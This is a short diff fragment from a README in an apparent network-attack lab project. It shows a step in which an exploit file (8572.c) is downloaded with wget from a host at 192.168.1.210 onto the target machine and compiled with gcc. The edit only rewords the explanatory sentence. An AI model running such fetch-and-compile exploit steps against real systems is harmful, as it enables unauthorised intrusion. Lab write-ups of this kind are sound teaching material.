jjay1288/NetworkAttackProject/README.md

 wget http://192.168.1.210:8080/8572.c
 ```

-​	Then we compile the C code on the target machine into an executable file.
+​	Then we compile the C code of our exploit on the target machine into an executable file.

 ```bash
 gcc -o exploit 8572.c